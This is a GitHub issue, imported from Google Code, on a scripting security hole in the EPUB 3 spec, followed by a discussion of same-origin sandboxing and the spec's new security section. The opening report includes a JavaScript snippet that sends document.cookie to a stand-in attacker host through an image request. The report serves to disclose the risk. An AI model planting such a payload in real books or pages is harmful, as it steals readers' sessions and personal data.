w3c / epub-specs

Shared workspace for EPUB 3 specifications.
Other
304 stars 60 forks source link

Scripting: SECURITY: Trojan Vulnerability #91

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
I have found a way to include a trojan in an EPUB 3 document.

  <script>
    var heehee = document.createElement('img');
    heehee.src = "http://<evilhackerz>.org/steal.asp?x="+document.cookie;
    document.appendChild(heehee);
  </script>

Original issue reported on code.google.com by josephpe...@gmail.com on 21 Feb 2011 at 9:45

GoogleCodeExporter commented 9 years ago
Could you clarify a bit? What exactly is being stolen here? What do you expect 
to see in document.cookie? (other than the cookies that scripts in the evil 
document itself would set).

Original comment by soroto...@gmail.com on 24 Feb 2011 at 9:42

GoogleCodeExporter commented 9 years ago
In the case of any browser-based ebook reader, like Booki.sh or Google 
Editions: the works. Session data, personally identifying information, etc. 
This content has to be run in a trusted context, but if scripting is allowed by 
the spec, the content can't be trusted. Cookies are just one vulnerability.

Original comment by joseph%i...@gtempaccount.com on 24 Feb 2011 at 10:25

GoogleCodeExporter commented 9 years ago
Well, the spec does not mandate epub implementors to use the same domain for 
their book viewing app and to serve book content. And scripting is only truly 
needed in embedded content (like inside iframe).

Implementation can choose to serve unmodified non-spine content from, say, 
acme-evil.com and book viewing app code and spine content with scripts removed 
from acme-good.com. That seems like a valid way to implement the spec.

Another way to go is to do something similar to what livejournal does. It 
creates a separate domain for each user, one would create a domain for each 
book in this case.

If it is the case that the spec is implementable securely, then I think these 
issues are just bugs in specific implementations, not problems in the spec.

Original comment by soroto...@gmail.com on 25 Feb 2011 at 6:07

GoogleCodeExporter commented 9 years ago
Yes, that's exactly how Booki.sh works — one domain per book, eg: 
http://audacity-of-hope-5c2708.reading.booki.sh

The problem is that if you serve content in an iframe from another domain, the 
same origin policy prevents the reading system from accessing the DOM and 
execution environment of the iframe.

This to me is the primary issue with "container-constrained" scripts. Obviously 
it's not as calamitous as spine-level scripts, but I think it's problematic to 
specify that the reading system serve content it can't even access or share 
session/cookie/running state with.

The secondary issue is the same origin policy running in the other direction 
— it's not possible to implement this per the spec (where the DOM of the 
parent is visible but immutable). I have a little more on that topic here: 
http://blog.booki.sh/blog/post/epub-3-0-and-scripted-content-documents 

Original comment by joseph%i...@gtempaccount.com on 25 Feb 2011 at 6:31

GoogleCodeExporter commented 9 years ago
First, I should thank you for looking into this stuff. Let's see if we can come 
up with any conclusion.

I do not think you *have* to provide access to iframe parent, if I remember it 
right, the spec just lists restrictions that should be followed if you do. So 
just breaking it into trusted and untrusted domain seems sufficient. Yes, 
embedded scriptable content will be opaque for your reading app, but you don't 
have to have that access to implement the spec, right?

Now, check my logic for per-book domain approach, it is more complex. The 
advantage is that there is no unexpected access restrictions. The disadvantage 
is that your viewing application becomes wide open to potentially evil book 
scripts and you have to worry about things like cookies being stolen. (Other 
parts of you app still can be hidden, only viewing portion has to be protected 
against abuse). I think that as long as you can sneak some private key (or a 
session-id) from your server to your client side code, it should be workable: 
you can make cookies opaque or encrypt them or store everything of value on the 
server. And sneaking that initial key can be done, for instance, by including 
it in your app mark-up, removing it from the DOM and storing it into JavaScript 
variable in a private scope which only your code can access.

One note: while web-based Reading Systems are important, most of the Reading 
Systems today are not web-based, so these issues get attention only from a 
handful of members.

Original comment by soroto...@gmail.com on 26 Feb 2011 at 7:41

GoogleCodeExporter commented 9 years ago
On the first point, the draft currently says:

"An executing script may have read access to the DOM of its parent Content 
Document, but the Reading System must not allow it to modify that DOM, nor 
other content in the Publication."

You're right, the RS need not provide access to the parent. I think it'd be 
better if the spec said "must not have access to the scripting environment or 
DOM of its parent document", since that would bring it into conformance with 
standard JavaScript security models. Probably a minor point.

I agree that you don't need access into iframe internals to implement the spec. 
We would consider implementing off-domain sandboxing of container-constrained 
scripts in Booki.sh, if it made the spec. It's still not clear how these would 
work consistently across reading systems from an interaction model perspective, 
but from a security perspective I'm less troubled by them.

As for JavaScript in the spine-level documents, I don't believe that per-book 
domains give you any additional comfort. We've implemented them for caching 
reasons, not security reasons. You're right that you can make cookies "secure" 
on https domains, you can mark them as read-only in some browsers, and you can 
encrypt them. You also make a good case about using some of the scoping 
features of JS to hide personal or system information. I think the continually 
improving introspection powers of JS engines will thwart that. JS engines 
simply aren't designed to provide black box security.

None of this makes me at all comfortable with enabling scripting in the Reading 
System execution environment — there are too many vectors of attack. You're 
up against hackers capable of this sort of ingenuity: 
http://ha.ckers.org/xss.html

I apologise for repeating myself, but I really can't understand why the WG is 
flirting with potential accusations of trojan vulnerabilities when there's been 
almost no public experimentation with scripting in reading systems. Why aren't 
we doing this in labs and on Github before we do this in the spec?

Anyway, thanks for discussing these issues Peter; much appreciated.

Original comment by joseph%i...@gtempaccount.com on 2 Mar 2011 at 12:44

GoogleCodeExporter commented 9 years ago

Original comment by markus.g...@gmail.com on 8 Mar 2011 at 10:00

GoogleCodeExporter commented 9 years ago
A new section "2.4.4 Security Considerations" was added to the spec that brings 
security issues to the attention of the content developers. We do not mandate a 
specific implementation path, as that would differ to much between various 
Reading Systems.

Original comment by soroto...@gmail.com on 19 Apr 2011 at 7:18